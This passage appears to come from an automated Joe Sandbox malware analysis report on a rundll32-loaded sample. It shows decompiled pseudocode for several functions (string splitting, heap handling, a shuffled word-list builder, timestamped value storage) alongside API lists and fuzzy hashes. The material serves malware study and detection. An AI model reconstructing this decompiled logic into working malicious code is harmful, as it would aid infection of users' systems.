                                  • Part of subcall function 042846B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04284709
                                  • Part of subcall function 042846B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04284714
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04283091
                                • wsprintfA.USER32 ref: 042830C1
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 12ce115f4c7e27e7c727341bc02611a529f99f4719eae1458b380b06e35ae6a2
                                • Instruction ID: 25a755c25301541dae67f17cdcc8ea9e8c1ee2b0b97f4640243e0ac1bb4cc130
                                • Opcode Fuzzy Hash: 12ce115f4c7e27e7c727341bc02611a529f99f4719eae1458b380b06e35ae6a2
                                • Instruction Fuzzy Hash: 4751C671B33215ABEB21FBA5EC48B6E77A8EB04F14F10441DE905D71C1E6B9E944CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04282D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 362 4282d74-4282da1 call 4281525 365 4282ef5-4282ef7 362->365 366 4282da7-4282dad 362->366 368 4282ef8-4282efe 365->368 367 4282daf-4282db3 366->367 369 4282dfb-4282dfd 367->369 370 4282db5-4282db7 367->370 371 4282e0a-4282e0e 369->371 372 4282dff-4282e02 369->372 373 4282db9-4282dbb 370->373 374 4282de1-4282de3 370->374 380 4282ee8 371->380 381 4282e14-4282e2c call 4281525 371->381 377 4282e04 372->377 378 4282e07 372->378 373->374 379 4282dbd-4282dbf 373->379 375 4282df2 374->375 376 4282de5-4282de8 374->376 384 4282df5-4282df9 375->384 382 4282dea 376->382 383 4282ded-4282df0 376->383 377->378 378->371 386 4282dde-4282ddf 379->386 387 4282dc1-4282dc3 379->387 385 4282eea 380->385 395 4282e32-4282e42 381->395 396 4282ee4-4282ee6 381->396 382->383 383->375 384->367 384->369 389 4282eeb-4282ef3 call 4288b22 385->389 386->384 387->371 390 4282dc5-4282dd6 387->390 389->368 393 4282dd8 390->393 394 4282ddb-4282ddd 390->394 393->394 394->386 398 4282e48 395->398 399 4282eda-4282ee2 395->399 396->385 400 4282e4d-4282e94 lstrcpy lstrcat 398->400 399->389 401 4282e96-4282ea5 lstrcmp 400->401 402 4282eb7-4282ed4 lstrlen 400->402 403 4282eb4 401->403 404 4282ea7-4282eb0 401->404 402->399 402->400 403->402 404->401 405 4282eb2 404->405 405->402
                                C-Code - Quality: 22%
                                			E04282D74(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E04281525(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E04288B22(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E04281525((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x428d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                0x04282d7b
                                0x04282d82
                                0x04282d87
                                0x04282d8a
                                0x04282d91
                                0x04282d94
                                0x04282d97
                                0x04282d9c
                                0x04282da1
                                0x04282ef5
                                0x04282ef7
                                0x04282ef9
                                0x04282efe
                                0x04282efe
                                0x04282da7
                                0x04282daa
                                0x04282dad
                                0x04282daf
                                0x04282daf
                                0x04282db3
                                0x00000000
                                0x00000000
                                0x04282db7
                                0x04282de3
                                0x04282de8
                                0x04282dea
                                0x04282dea
                                0x04282ded
                                0x04282df0
                                0x04282df0
                                0x04282df2
                                0x00000000
                                0x04282dbd
                                0x04282dbf
                                0x04282dde
                                0x04282dde
                                0x04282df5
                                0x04282df5
                                0x04282df6
                                0x04282df6
                                0x04282df9
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04282df9
                                0x04282dc3
                                0x04282e0a
                                0x04282e0e
                                0x04282ee8
                                0x04282eea
                                0x04282eea
                                0x04282eeb
                                0x04282eee
                                0x00000000
                                0x04282eee
                                0x04282e17
                                0x04282e28
                                0x04282e2c
                                0x04282ee4
                                0x00000000
                                0x04282ee4
                                0x04282e32
                                0x04282e35
                                0x04282e39
                                0x04282e3d
                                0x04282e42
                                0x04282eda
                                0x04282eda
                                0x00000000
                                0x04282ee0
                                0x04282e4d
                                0x04282e56
                                0x04282e6a
                                0x04282e71
                                0x04282e86
                                0x04282e8c
                                0x04282e94
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04282e96
                                0x04282e96
                                0x04282e96
                                0x04282e9d
                                0x04282ea5
                                0x00000000
                                0x00000000
                                0x04282ea7
                                0x04282eb0
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04282eb2
                                0x04282eb4
                                0x04282eb7
                                0x04282eb7
                                0x04282eba
                                0x04282ebe
                                0x04282ec1
                                0x04282ec7
                                0x04282eca
                                0x04282ed1
                                0x00000000
                                0x04282e4d
                                0x04282dc8
                                0x04282dd0
                                0x04282dd6
                                0x04282dd8
                                0x04282dd8
                                0x04282ddb
                                0x04282ddd
                                0x00000000
                                0x04282ddd
                                0x04282db7
                                0x04282dfd
                                0x04282e02
                                0x04282e04
                                0x04282e04
                                0x04282e07
                                0x04282e07
                                0x00000000

                                APIs
                                  • Part of subcall function 04281525: RtlAllocateHeap.NTDLL(00000000,00000000,04281278), ref: 04281531
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 04282E71
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 04282E86
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 04282E9D
                                • lstrlen.KERNEL32(69B25F45), ref: 04282EC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 50a769a67c3d540f2816133d48ec43a4a2f3892834537db8f7e57056025e8a5e
                                • Instruction ID: 4c35a955d300cf497413cc01c4fc1f7a3608e1dbdf8321359526350176a60d4e
                                • Opcode Fuzzy Hash: 50a769a67c3d540f2816133d48ec43a4a2f3892834537db8f7e57056025e8a5e
                                • Instruction Fuzzy Hash: F351D331B12109EBDF20EF99C8847ADBBB5FF55314F14809EE815AB281C770BA41CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04285319, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04285319(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E0428155A(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x428d2a8; // 0xaea5a8
				_t4 = _t24 + 0x428edc0; // 0x4d79368
				_t5 = _t24 + 0x428ed68; // 0x4f0053
				_t26 = E04285D79( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x428d2a8; // 0xaea5a8
						_t11 = _t32 + 0x428edb4; // 0x4d7935c
						_t48 = _t11;
						_t12 = _t32 + 0x428ed68; // 0x4f0053
						_t52 = E0428272D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x428d2a8; // 0xaea5a8
							_t13 = _t35 + 0x428edfe; // 0x30314549
							_t37 = E04285B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x428d25c - 6;
								if( *0x428d25c <= 6) {
									_t42 =  *0x428d2a8; // 0xaea5a8
									_t15 = _t42 + 0x428ec0a; // 0x52384549
									E04285B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x428d2a8; // 0xaea5a8
							_t17 = _t38 + 0x428edf8; // 0x4d793a0
							_t18 = _t38 + 0x428edd0; // 0x680043
							_t45 = E04284538(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x428d238, 0, _t52);
						}
					}
					HeapFree( *0x428d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04284FF0(_t54);
				}
				return _t45;
			}



















                                0x04285319
                                0x04285329
                                0x0428532c
                                0x04285333
                                0x04285335
                                0x04285335
                                0x04285338
                                0x0428533d
                                0x04285344
                                0x04285351
                                0x04285356
                                0x0428535a
                                0x04285368
                                0x04285376
                                0x0428537a
                                0x0428540b
                                0x0428540b
                                0x04285380
                                0x04285380
                                0x04285385
                                0x04285385
                                0x0428538c
                                0x04285398
                                0x0428539a
                                0x0428539c
                                0x0428539e
                                0x042853a5
                                0x042853b0
                                0x042853b7
                                0x042853b9
                                0x042853c0
                                0x042853c2
                                0x042853c9
                                0x042853d4
                                0x042853d4
                                0x042853c0
                                0x042853d9
                                0x042853de
                                0x042853e5
                                0x04285403
                                0x04285405
                                0x04285405
                                0x0428539c
                                0x04285417
                                0x04285417
                                0x04285419
                                0x0428541e
                                0x04285420
                                0x04285420
                                0x0428542b

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04D79368,00000000,?,74E5F710,00000000,74E5F730), ref: 04285368
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04D793A0,?,00000000,30314549,00000014,004F0053,04D7935C), ref: 04285405
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04287CCB), ref: 04285417
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: fe61d6dcd772f47f5b816a86fe53407fc44f1a1a26685cd481170e2cd1efd846
                                • Instruction ID: 6f9f58a0c2127bbf8b0309e231b3e92b130d5df597649c1dc41a7201081128cc
                                • Opcode Fuzzy Hash: fe61d6dcd772f47f5b816a86fe53407fc44f1a1a26685cd481170e2cd1efd846
                                • Instruction Fuzzy Hash: 25318031B22119FFEB11AB94EC48E9EBBBDEF44754B15016DF500D70A1D770AA88DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04282C58, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E04282C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				void* _t13;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x428d340; // 0x4d79b20
				_push(0x800);
				_push(0);
				_push( *0x428d238);
				if( *0x428d24c >= 5) {
					_t13 = RtlAllocateHeap(); // executed
					if(_t13 == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x428d24c =  *0x428d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E04282C0D(_t44, _t40);
						_t18 = E042831A8(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x428d24c < 5) {
								 *0x428d24c =  *0x428d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E04285433();
						HeapFree( *0x428d238, 0, _t40);
						goto L10;
					}
					_t24 = E04289BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E04285450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}












                                0x04282c58
                                0x04282c58
                                0x04282c5b
                                0x04282c5c
                                0x04282c66
                                0x04282c6d
                                0x04282c72
                                0x04282c74
                                0x04282c7a
                                0x04282c9a
                                0x04282ca2
                                0x04282cba
                                0x04282cbc
                                0x04282cbd
                                0x04282cbf
                                0x04282cfd
                                0x04282cfd
                                0x04282d03
                                0x04282d09
                                0x04282d09
                                0x04282cc1
                                0x04282cc7
                                0x04282cca
                                0x04282cd9
                                0x04282cdb
                                0x04282ce2
                                0x04282d16
                                0x04282d1b
                                0x04282d1d
                                0x04282d1f
                                0x04282d1f
                                0x00000000
                                0x04282d1d
                                0x04282ce4
                                0x04282ce9
                                0x04282cf7
                                0x00000000
                                0x04282cf7
                                0x04282cb1
                                0x04282cb6
                                0x04282cb6
                                0x00000000
                                0x04282cb6
                                0x04282c84
                                0x00000000
                                0x00000000
                                0x04282c93
                                0x00000000

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 04282C7C
                                  • Part of subcall function 04285450: GetTickCount.KERNEL32 ref: 04285464
                                  • Part of subcall function 04285450: wsprintfA.USER32 ref: 042854B4
                                  • Part of subcall function 04285450: wsprintfA.USER32 ref: 042854D1
                                  • Part of subcall function 04285450: wsprintfA.USER32 ref: 042854FD
                                  • Part of subcall function 04285450: HeapFree.KERNEL32(00000000,?), ref: 0428550F
                                  • Part of subcall function 04285450: wsprintfA.USER32 ref: 04285530
                                  • Part of subcall function 04285450: HeapFree.KERNEL32(00000000,?), ref: 04285540
                                  • Part of subcall function 04285450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0428556E
                                  • Part of subcall function 04285450: GetTickCount.KERNEL32 ref: 0428557F
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 04282C9A
                                • HeapFree.KERNEL32(00000000,00000002,04287D16,?,04287D16,00000002,?,?,0428312C,?), ref: 04282CF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                • String ID: Ut
                                • API String ID: 1676223858-8415677
                                • Opcode ID: 635775f502c5b7f007ad0d3c09a5ecaf457deaf30d6cf3ce6de1778732f78070
                                • Instruction ID: b7d38c131ae3d41148cf6094ecdb2e5f32d093e385196bc262d1e9a446cf0852
                                • Opcode Fuzzy Hash: 635775f502c5b7f007ad0d3c09a5ecaf457deaf30d6cf3ce6de1778732f78070
                                • Instruction Fuzzy Hash: DE214A75322205EBE701AF59E848AAE37ACEF54355F01405EF90196290DB74B9449B71
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04288A19, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 04288A76
                                • SysAllocString.OLEAUT32(04284BD8), ref: 04288ABA
                                • SysFreeString.OLEAUT32(00000000), ref: 04288ACE
                                • SysFreeString.OLEAUT32(00000000), ref: 04288ADC
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 4362e1fe43042441e1e2bf9b513daf8f627ada5fbefab759ccc3b1f1e2af91e6
                                • Instruction ID: 5fad78c57d2216640c046c92a3c11ec2ed3d71356ef9178fc918d0652df633cc
                                • Opcode Fuzzy Hash: 4362e1fe43042441e1e2bf9b513daf8f627ada5fbefab759ccc3b1f1e2af91e6
                                • Instruction Fuzzy Hash: 9F312172A11209EFDB04EF98D8C49AE7BB9FF48350B60842EF505D7290E775A941CF61
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04285B05, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50memorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04285B05(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				void* _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E04287B3B(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E04282D2E(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E0428A38F(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x428d238, 0, _t25);
				}
				return _t22;
			}











                                0x04285b05
                                0x04285b16
                                0x04285b1a
                                0x04285b75
                                0x04285b1c
                                0x04285b23
                                0x04285b2b
                                0x04285b2e
                                0x04285b33
                                0x04285b37
                                0x04285b3d
                                0x04285b45
                                0x04285b48
                                0x04285b60
                                0x04285b60
                                0x04285b6b
                                0x04285b6b
                                0x04285b7c

                                APIs
                                  • Part of subcall function 04287B3B: lstrlen.KERNEL32(?,00000000,04D79D18,00000000,04285142,04D79F3B,?,?,?,?,?,69B25F44,00000005,0428D00C), ref: 04287B42
                                  • Part of subcall function 04287B3B: mbstowcs.NTDLL ref: 04287B6B
                                  • Part of subcall function 04287B3B: memset.NTDLL ref: 04287B7D
                                • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04D7935C), ref: 04285B3D
                                • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,04D7935C), ref: 04285B6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                                • String ID: Ut
                                • API String ID: 1500278894-8415677
                                • Opcode ID: 6d8129eac1f5bdf721979979f03569f2cb6e67c890ec27432a53c045c9e64bd5
                                • Instruction ID: 34458b3442cd461e3336c94b5330bc94279a8b661bec3a08e26256517a72f999
                                • Opcode Fuzzy Hash: 6d8129eac1f5bdf721979979f03569f2cb6e67c890ec27432a53c045c9e64bd5
                                • Instruction Fuzzy Hash: 7D018831321209BBEB216F99DC44F9F7BB9EF84754F50402DFA009A1A4DB71E955C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04284A2A, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                                Download Yara Rule
                                C-Code - Quality: 47%
                                			E04284A2A(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E04281525(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x428c284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                                0x04284a2e
                                0x04284a3b
                                0x04284a3d
                                0x04284a3e
                                0x04284a46
                                0x04284a46
                                0x04284a4a
                                0x00000000
                                0x00000000
                                0x04284a41
                                0x04284a42
                                0x04284a45
                                0x04284a45
                                0x04284a52
                                0x04284a57
                                0x04284a5c
                                0x04284a64
                                0x04284a6a
                                0x04284a6c
                                0x04284a6f
                                0x04284a73
                                0x04284a75
                                0x04284a78
                                0x04284a78
                                0x04284a79
                                0x04284a7b
                                0x04284a78
                                0x04284a85
                                0x04284a88
                                0x04284a8b
                                0x04284a8c
                                0x04284a8e
                                0x04284a95
                                0x04284a95
                                0x04284aa1

                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,04D795AC,042830F3,?,04281173,?,04D795AC,?,042830F3), ref: 04284A46
                                • StrTrimA.SHLWAPI(?,0428C284,00000002,?,04281173,?,04D795AC,?,042830F3), ref: 04284A64
                                • StrChrA.SHLWAPI(?,00000020,?,04281173,?,04D795AC,?,042830F3), ref: 04284A6F
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: Trim
                                • String ID:
                                • API String ID: 3043112668-0
                                • Opcode ID: 34d0d5830c83bb7d7f52c0ad4dce97fbf25d6e39be78fce90c3d35a340ea9e5b
                                • Instruction ID: f5d0beb16a9018a65214da0dee384eb9644a78272c0794507fe2ec706b199222
                                • Opcode Fuzzy Hash: 34d0d5830c83bb7d7f52c0ad4dce97fbf25d6e39be78fce90c3d35a340ea9e5b
                                • Instruction Fuzzy Hash: E5019E713223076BE7207F6A9C68F6F7B9DEB85744F408019A945CF2C2EA74E8028664
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04288B22, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04288B22(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x428d238, 0, _a4); // executed
				return _t2;
			}




                                0x04288b2e
                                0x04288b34

                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000000,0428131A,00000000,?,?,00000000), ref: 04288B2E
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.797793589.0000000004281000.00000020.00020000.sdmp, Offset: 04280000, based on PE: true
                                • Associated: 00000005.00000002.797775742.0000000004280000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797838097.000000000428C000.00000002.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797848047.000000000428D000.00000004.00020000.sdmp Download File
                                • Associated: 00000005.00000002.797862706.000000000428F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_4280000_rundll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: cb99f40af25a69ebe82c9da27074d08b01e33ab1b3214f77ba0d170a8f2ee83f
                                • Instruction ID: 4a89a1b937db1e6bdc04c5a9ac6564f845fd10367cd0e6df62be520023897a65
                                • Opcode Fuzzy Hash: cb99f40af25a69ebe82c9da27074d08b01e33ab1b3214f77ba0d170a8f2ee83f
                                • Instruction Fuzzy Hash: 7EB01271301100EBDA114B45FE0CF0DFA21EB50740F004019B304080B487354C20FB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 042876E7, Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                Download Yara Rule
                                C-Code - Quality: 75%
